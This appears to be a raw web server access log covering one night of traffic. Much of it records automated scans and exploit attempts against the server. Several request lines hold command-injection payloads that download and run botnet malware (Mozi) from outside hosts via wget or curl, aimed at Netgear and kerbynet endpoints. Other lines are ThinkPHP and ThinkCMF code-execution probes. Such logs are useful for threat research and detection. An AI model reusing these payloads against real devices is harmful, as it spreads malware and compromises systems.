213.226.123.30 - - [05/May/2022:23:59:16 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.246.72 - - [06/May/2022:00:00:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
213.226.123.30 - - [06/May/2022:00:00:39 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
213.226.123.30 - - [06/May/2022:00:00:59 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
157.245.70.127 - - [06/May/2022:00:04:13 +0200] "GET /ab2g HTTP/1.1" 400 329 "-" "-"
157.245.70.127 - - [06/May/2022:00:04:13 +0200] "GET /ab2h HTTP/1.1" 400 329 "-" "-"
45.143.146.182 - - [06/May/2022:00:05:50 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
45.143.146.182 - - [06/May/2022:00:05:50 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
43.129.96.96 - - [06/May/2022:00:07:38 +0200] "HEAD /cdn-cgi/trace HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36"
43.129.96.96 - - [06/May/2022:00:07:38 +0200] "HEAD /cdn-cgi/trace HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36"
43.129.96.96 - - [06/May/2022:00:07:46 +0200] "HEAD /cdn-cgi/trace HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36"
43.129.96.96 - - [06/May/2022:00:07:50 +0200] "HEAD /cdn-cgi/trace HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36"
43.129.96.96 - - [06/May/2022:00:07:50 +0200] "HEAD /cdn-cgi/trace HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36"
113.122.50.168 - - [06/May/2022:00:08:18 +0200] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://113.122.50.168:59494/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 310 "-" "-"
213.226.123.30 - - [06/May/2022:00:08:47 +0200] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.180.143.7 - - [06/May/2022:00:09:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
213.226.123.30 - - [06/May/2022:00:10:16 +0200] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
80.82.78.39 - - [06/May/2022:00:15:41 +0200] "GET /RVP/index10.php HTTP/1.1" 404 320 "-" "Mozilla/5.0"
80.82.78.39 - - [06/May/2022:00:15:53 +0200] "\x16\x03\x01" 501 318 "-" "-"
80.82.78.39 - - [06/May/2022:00:26:10 +0200] "GET /RVP/index10.php HTTP/1.1" 404 320 "-" "Mozilla/5.0"
80.82.78.39 - - [06/May/2022:00:26:18 +0200] "\x16\x03\x01" 501 318 "-" "-"
185.180.143.11 - - [06/May/2022:00:33:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
213.226.123.30 - - [06/May/2022:00:33:24 +0200] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.180.143.72 - - [06/May/2022:00:35:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.173.35.17 - - [06/May/2022:00:36:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com"
128.1.248.26 - - [06/May/2022:00:39:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
213.226.123.30 - - [06/May/2022:00:40:45 +0200] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
20.127.91.237 - - [06/May/2022:00:42:48 +0200] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
20.127.91.237 - - [06/May/2022:00:43:58 +0200] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
20.127.91.237 - - [06/May/2022:00:43:58 +0200] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
20.127.91.237 - - [06/May/2022:00:44:30 +0200] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
20.127.91.237 - - [06/May/2022:00:44:58 +0200] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
43.245.216.178 - - [06/May/2022:00:45:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
213.226.123.30 - - [06/May/2022:00:45:24 +0200] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
20.127.91.237 - - [06/May/2022:00:46:27 +0200] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
80.82.78.39 - - [06/May/2022:00:46:28 +0200] "GET /RVP/index10.php HTTP/1.1" 404 320 "-" "Mozilla/5.0"
80.82.78.39 - - [06/May/2022:00:46:42 +0200] "\x16\x03\x01" 501 318 "-" "-"
167.94.138.45 - - [06/May/2022:00:49:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.45 - - [06/May/2022:00:49:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.45 - - [06/May/2022:00:49:37 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
213.226.123.30 - - [06/May/2022:00:53:20 +0200] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
83.220.86.34 - - [06/May/2022:00:55:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
213.226.123.30 - - [06/May/2022:00:55:10 +0200] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
202.129.58.130 - - [06/May/2022:00:56:35 +0200] "GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 HTTP/1.0" 404 317 "-" "-"
20.127.91.237 - - [06/May/2022:00:59:59 +0200] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
213.226.123.30 - - [06/May/2022:01:02:06 +0200] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
213.226.123.30 - - [06/May/2022:01:02:09 +0200] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.180.143.79 - - [06/May/2022:01:03:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.61.188.169 - - [06/May/2022:01:04:31 +0200] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
213.226.123.30 - - [06/May/2022:01:12:32 +0200] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
80.82.78.39 - - [06/May/2022:01:13:30 +0200] "GET /RVP/index10.php HTTP/1.1" 404 320 "-" "Mozilla/5.0"
80.82.78.39 - - [06/May/2022:01:13:37 +0200] "\x16\x03\x01" 501 318 "-" "-"
209.141.57.178 - - [06/May/2022:01:17:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
23.128.248.97 - - [06/May/2022:01:17:58 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
213.226.123.30 - - [06/May/2022:01:18:45 +0200] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
111.19.191.76 - - [06/May/2022:01:19:01 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
213.226.123.30 - - [06/May/2022:01:20:43 +0200] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
213.226.123.30 - - [06/May/2022:01:23:14 +0200] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
103.170.92.19 - - [06/May/2022:01:24:48 +0200] "GET /boaform/admin/formLogin?username=user&psd=user HTTP/1.0" 404 324 "-" "-"
20.127.91.237 - - [06/May/2022:01:26:31 +0200] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
221.160.177.153 - - [06/May/2022:01:27:52 +0200] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 319 "-" "Hello, World"
20.127.91.237 - - [06/May/2022:01:28:03 +0200] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
213.226.123.30 - - [06/May/2022:01:28:21 +0200] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
20.127.91.237 - - [06/May/2022:01:28:31 +0200] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
213.226.123.30 - - [06/May/2022:01:30:51 +0200] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.220.101.36 - - [06/May/2022:01:37:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
23.128.248.79 - - [06/May/2022:01:37:41 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
213.226.123.30 - - [06/May/2022:01:38:34 +0200] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.61.188.169 - - [06/May/2022:01:52:03 +0200] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
205.210.31.20 - - [06/May/2022:01:52:36 +0200] "\x16\x03\x01" 501 318 "-" "-"
213.226.123.30 - - [06/May/2022:02:04:08 +0200] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
213.226.123.30 - - [06/May/2022:02:04:58 +0200] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
64.62.197.212 - - [06/May/2022:02:05:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
80.82.78.39 - - [06/May/2022:02:07:10 +0200] "GET /RVP/index10.php HTTP/1.1" 404 320 "-" "Mozilla/5.0"
64.62.197.212 - - [06/May/2022:02:08:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
168.91.44.149 - - [06/May/2022:02:09:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36"
80.82.78.39 - - [06/May/2022:02:10:42 +0200] "GET /RVP/index10.php HTTP/1.1" 404 320 "-" "Mozilla/5.0"
45.61.188.169 - - [06/May/2022:02:10:48 +0200] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
80.82.78.39 - - [06/May/2022:02:11:02 +0200] "\x16\x03\x01" 501 318 "-" "-"
74.82.47.4 - - [06/May/2022:02:11:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
89.216.96.220 - - [06/May/2022:02:13:13 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
213.226.123.30 - - [06/May/2022:02:13:36 +0200] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
213.226.123.30 - - [06/May/2022:02:14:06 +0200] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
213.226.123.30 - - [06/May/2022:02:21:19 +0200] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
185.162.235.110 - - [06/May/2022:02:26:41 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "curl/7.58.0"
45.143.146.182 - - [06/May/2022:02:28:44 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
45.143.146.182 - - [06/May/2022:02:28:44 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
216.218.206.67 - - [06/May/2022:02:30:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
64.62.197.182 - - [06/May/2022:02:37:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
74.82.47.2 - - [06/May/2022:02:40:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
213.226.123.30 - - [06/May/2022:02:41:46 +0200] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
167.94.138.119 - - [06/May/2022:02:43:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.119 - - [06/May/2022:02:43:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.119 - - [06/May/2022:02:43:32 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
213.226.123.30 - - [06/May/2022:02:46:20 +0200] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
213.226.123.30 - - [06/May/2022:02:46:56 +0200] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
65.49.20.68 - - [06/May/2022:02:48:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
213.226.123.30 - - [06/May/2022:02:50:02 +0200] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.114.145.31 - - [06/May/2022:02:50:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
213.226.123.30 - - [06/May/2022:02:51:50 +0200] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
213.226.123.30 - - [06/May/2022:02:56:08 +0200] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
95.52.96.62 - - [06/May/2022:02:58:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
151.242.146.109 - - [06/May/2022:02:58:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
213.226.123.30 - - [06/May/2022:02:59:36 +0200] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
104.206.128.6 - - [06/May/2022:03:00:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "https://gdnplus.com:Gather Analyze Provide."
213.226.123.30 - - [06/May/2022:03:00:30 +0200] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
134.122.112.12 - - [06/May/2022:03:01:36 +0200] "CONNECT leakix.net:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
134.122.112.12 - - [06/May/2022:03:01:37 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "l9explore/1.3.0"
134.122.112.12 - - [06/May/2022:03:01:38 +0200] "GET /frontend_dev.php/$ HTTP/1.1" 404 323 "-" "l9explore/1.3.0"
134.122.112.12 - - [06/May/2022:03:01:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "l9explore/1.3.0"
213.226.123.30 - - [06/May/2022:03:05:10 +0200] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
213.6.137.198 - - [06/May/2022:03:05:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
85.10.207.195 - - [06/May/2022:03:06:55 +0200] "GET /robots.txt HTTP/1.1" 404 334 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
85.10.207.195 - - [06/May/2022:03:06:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
183.136.225.35 - - [06/May/2022:03:09:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
157.230.216.203 - - [06/May/2022:03:09:42 +0200] "GET /ab2g HTTP/1.1" 400 329 "-" "-"
157.230.216.203 - - [06/May/2022:03:09:43 +0200] "GET /ab2h HTTP/1.1" 400 329 "-" "-"
112.237.62.29 - - [06/May/2022:03:13:30 +0200] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" 400 329 "-" "-"
80.82.78.39 - - [06/May/2022:03:14:40 +0200] "GET /RVP/index10.php HTTP/1.1" 404 320 "-" "Mozilla/5.0"
80.82.78.39 - - [06/May/2022:03:14:48 +0200] "\x16\x03\x01" 501 318 "-" "-"
64.62.197.212 - - [06/May/2022:03:16:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
184.105.139.69 - - [06/May/2022:03:17:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
80.82.78.39 - - [06/May/2022:03:19:03 +0200] "GET /RVP/index10.php HTTP/1.1" 404 320 "-" "Mozilla/5.0"
80.82.78.39 - - [06/May/2022:03:19:17 +0200] "\x16\x03\x01" 501 318 "-" "-"
74.82.47.2 - - [06/May/2022:03:19:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
54.36.149.72 - - [06/May/2022:03:26:14 +0200] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.152 - - [06/May/2022:03:26:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
189.90.255.215 - - [06/May/2022:03:26:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
80.82.78.39 - - [06/May/2022:03:29:09 +0200] "\x16\x03\x01" 501 318 "-" "-"
213.226.123.30 - - [06/May/2022:03:32:33 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
186.43.86.234 - - [06/May/2022:03:35:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
78.189.45.29 - - [06/May/2022:03:36:20 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
78.189.45.29 - - [06/May/2022:03:37:39 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
78.189.45.29 - - [06/May/2022:03:40:56 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
213.226.123.30 - - [06/May/2022:03:41:06 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
78.189.45.29 - - [06/May/2022:03:41:27 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
80.82.78.39 - - [06/May/2022:03:41:49 +0200] "GET /RVP/index10.php HTTP/1.1" 404 320 "-" "Mozilla/5.0"
80.82.78.39 - - [06/May/2022:03:41:57 +0200] "\x16\x03\x01" 501 318 "-" "-"
78.189.45.29 - - [06/May/2022:03:42:09 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
78.189.45.29 - - [06/May/2022:03:42:28 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
78.189.45.29 - - [06/May/2022:03:42:38 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
78.189.45.29 - - [06/May/2022:03:42:42 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
78.189.45.29 - - [06/May/2022:03:44:26 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
213.226.123.30 - - [06/May/2022:03:45:43 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
78.189.45.29 - - [06/May/2022:03:46:43 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
190.112.70.99 - - [06/May/2022:03:53:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
213.226.123.30 - - [06/May/2022:03:56:14 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
